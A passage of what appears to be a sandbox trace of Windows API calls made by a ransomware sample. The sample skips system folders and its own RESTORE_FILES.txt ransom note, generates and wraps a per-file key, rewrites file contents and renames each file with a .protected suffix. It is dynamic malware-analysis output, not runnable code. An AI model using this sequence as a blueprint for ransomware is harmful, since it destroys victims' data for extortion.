(in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs.protected") returned 83 [0094.395] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edbres00001.jrs"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edbres00001.jrs.protected")) returned 1 [0094.396] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.396] lstrcmpiW (lpString1="edbres00002.jrs", lpString2="Windows") returned -1 [0094.396] lstrcmpiW (lpString1="edbres00002.jrs", lpString2="Program Files") returned -1 [0094.396] lstrcmpiW (lpString1="edbres00002.jrs", lpString2="Program Files (x86)") returned -1 [0094.396] lstrcmpiW (lpString1="edbres00002.jrs", lpString2="$Recycle.bin") returned 1 [0094.396] lstrcmpiW (lpString1="edbres00002.jrs", lpString2="System Volume Information") returned -1 [0094.396] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs") returned 73 [0094.396] StrStrIW (lpFirst="edbres00002.jrs", lpSrch=".protected") returned 0x0 [0094.396] lstrcmpW (lpString1="edbres00002.jrs", lpString2="RESTORE_FILES.txt") returned -1 [0094.396] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0094.396] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0094.396] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edbres00002.jrs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0094.397] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs") returned 73 [0094.397] StrStrW (lpFirst="edbres00002.jrs", lpSrch=".txt") returned 0x0 [0094.397] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs") returned 73 [0094.397] StrStrW (lpFirst="edbres00002.jrs", lpSrch=".rar") returned 0x0 [0094.397] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs") returned 73 [0094.397] StrStrW (lpFirst="edbres00002.jrs", lpSrch=".zip") returned 0x0 [0094.397] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0094.398] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.398] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0094.398] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.398] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0094.400] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0094.400] CloseHandle (hObject=0x14c) returned 1 [0094.400] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs.protected") returned 83 [0094.400] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edbres00002.jrs"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edbres00002.jrs.protected")) returned 1 [0094.401] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.401] lstrcmpiW (lpString1="oeold.xml", lpString2="Windows") returned -1 [0094.401] lstrcmpiW (lpString1="oeold.xml", lpString2="Program Files") returned -1 [0094.401] lstrcmpiW (lpString1="oeold.xml", lpString2="Program Files (x86)") returned -1 [0094.401] lstrcmpiW (lpString1="oeold.xml", lpString2="$Recycle.bin") returned 1 [0094.401] lstrcmpiW (lpString1="oeold.xml", lpString2="System Volume Information") returned -1 [0094.401] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml") returned 67 [0094.401] StrStrIW (lpFirst="oeold.xml", lpSrch=".protected") returned 0x0 [0094.401] lstrcmpW (lpString1="oeold.xml", lpString2="RESTORE_FILES.txt") returned -1 [0094.401] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0094.401] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0094.401] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\oeold.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0094.402] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml") returned 67 [0094.402] StrStrW (lpFirst="oeold.xml", lpSrch=".txt") returned 0x0 [0094.402] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml") returned 67 [0094.402] StrStrW (lpFirst="oeold.xml", lpSrch=".rar") returned 0x0 [0094.402] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml") returned 67 [0094.402] StrStrW (lpFirst="oeold.xml", lpSrch=".zip") returned 0x0 [0094.402] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x104, lpOverlapped=0x0) returned 1 [0094.403] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xfffffefc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.403] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x104, lpOverlapped=0x0) returned 1 [0094.403] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.403] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0094.403] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0094.403] CloseHandle (hObject=0x14c) returned 1 [0094.403] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml.protected") returned 77 [0094.403] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\oeold.xml"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\oeold.xml.protected")) returned 1 [0094.404] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.404] lstrcmpiW (lpString1="Stationery", lpString2="Windows") returned -1 [0094.404] lstrcmpiW (lpString1="Stationery", lpString2="Program Files") returned 1 [0094.404] lstrcmpiW (lpString1="Stationery", lpString2="Program Files (x86)") returned 1 [0094.404] lstrcmpiW (lpString1="Stationery", lpString2="$Recycle.bin") returned 1 [0094.404] lstrcmpiW (lpString1="Stationery", lpString2="System Volume Information") returned -1 [0094.404] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery") returned 68 [0094.404] lstrcmpW (lpString1="Stationery", lpString2=".") returned 1 [0094.404] lstrcmpW (lpString1="Stationery", lpString2="..") returned 1 [0094.405] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\*") returned 70 [0094.405] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0094.407] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.407] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0094.407] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.407] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.407] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.407] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\.") returned 70 [0094.407] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.407] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0094.407] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0094.407] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.407] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.407] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\." (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.407] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.407] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.407] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.407] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.407] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.407] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.408] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\..") returned 71 [0094.408] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.408] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.408] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0094.408] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0094.408] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.408] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.408] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\.." (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.408] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.408] lstrcmpiW (lpString1="Bears.htm", lpString2="Windows") returned -1 [0094.408] lstrcmpiW (lpString1="Bears.htm", lpString2="Program Files") returned -1 [0094.408] lstrcmpiW (lpString1="Bears.htm", lpString2="Program Files (x86)") returned -1 [0094.408] lstrcmpiW (lpString1="Bears.htm", lpString2="$Recycle.bin") returned 1 [0094.408] lstrcmpiW (lpString1="Bears.htm", lpString2="System Volume Information") returned -1 [0094.408] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm") returned 78 [0094.408] StrStrIW (lpFirst="Bears.htm", lpSrch=".protected") returned 0x0 [0094.408] lstrcmpW (lpString1="Bears.htm", lpString2="RESTORE_FILES.txt") returned -1 [0094.408] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.408] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.408] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.409] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm") returned 78 [0094.409] StrStrW (lpFirst="Bears.htm", lpSrch=".txt") returned 0x0 [0094.409] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm") returned 78 [0094.409] StrStrW (lpFirst="Bears.htm", lpSrch=".rar") returned 0x0 [0094.409] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm") returned 78 [0094.409] StrStrW (lpFirst="Bears.htm", lpSrch=".zip") returned 0x0 [0094.409] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0xff, lpOverlapped=0x0) returned 1 [0094.410] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff01, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.410] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0xff, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0xff, lpOverlapped=0x0) returned 1 [0094.411] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.411] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.411] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.411] CloseHandle (hObject=0x150) returned 1 [0094.411] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm.protected") returned 88 [0094.411] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.htm"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.htm.protected")) returned 1 [0094.412] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.412] lstrcmpiW (lpString1="Bears.jpg", lpString2="Windows") returned -1 [0094.412] lstrcmpiW (lpString1="Bears.jpg", lpString2="Program Files") returned -1 [0094.412] lstrcmpiW (lpString1="Bears.jpg", lpString2="Program Files (x86)") returned -1 [0094.412] lstrcmpiW (lpString1="Bears.jpg", lpString2="$Recycle.bin") returned 1 [0094.412] lstrcmpiW (lpString1="Bears.jpg", lpString2="System Volume Information") returned -1 [0094.412] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg") returned 78 [0094.412] StrStrIW (lpFirst="Bears.jpg", lpSrch=".protected") returned 0x0 [0094.412] lstrcmpW (lpString1="Bears.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0094.412] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.412] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.412] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.417] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg") returned 78 [0094.417] StrStrW (lpFirst="Bears.jpg", lpSrch=".txt") returned 0x0 [0094.417] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg") returned 78 [0094.417] StrStrW (lpFirst="Bears.jpg", lpSrch=".rar") returned 0x0 [0094.425] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg") returned 78 [0094.425] StrStrW (lpFirst="Bears.jpg", lpSrch=".zip") returned 0x0 [0094.425] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x432, lpOverlapped=0x0) returned 1 [0094.426] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffbce, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.426] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x432, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x432, lpOverlapped=0x0) returned 1 [0094.438] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.438] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.438] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.438] CloseHandle (hObject=0x150) returned 1 [0094.438] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg.protected") returned 88 [0094.438] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.jpg.protected")) returned 1 [0094.439] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.439] lstrcmpiW (lpString1="Desktop.ini", lpString2="Windows") returned -1 [0094.439] lstrcmpiW (lpString1="Desktop.ini", lpString2="Program Files") returned -1 [0094.439] lstrcmpiW (lpString1="Desktop.ini", lpString2="Program Files (x86)") returned -1 [0094.439] lstrcmpiW (lpString1="Desktop.ini", lpString2="$Recycle.bin") returned 1 [0094.439] lstrcmpiW (lpString1="Desktop.ini", lpString2="System Volume Information") returned -1 [0094.439] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini") returned 80 [0094.439] StrStrIW (lpFirst="Desktop.ini", lpSrch=".protected") returned 0x0 [0094.439] lstrcmpW (lpString1="Desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0094.439] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.439] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.439] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.439] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini") returned 80 [0094.439] StrStrW (lpFirst="Desktop.ini", lpSrch=".txt") returned 0x0 [0094.439] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini") returned 80 [0094.440] StrStrW (lpFirst="Desktop.ini", lpSrch=".rar") returned 0x0 [0094.440] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini") returned 80 [0094.440] StrStrW (lpFirst="Desktop.ini", lpSrch=".zip") returned 0x0 [0094.440] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x285, lpOverlapped=0x0) returned 1 [0094.441] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffd7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.441] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x285, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x285, lpOverlapped=0x0) returned 1 [0094.441] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.441] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.441] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.441] CloseHandle (hObject=0x150) returned 1 [0094.441] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini.protected") returned 90 [0094.441] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows 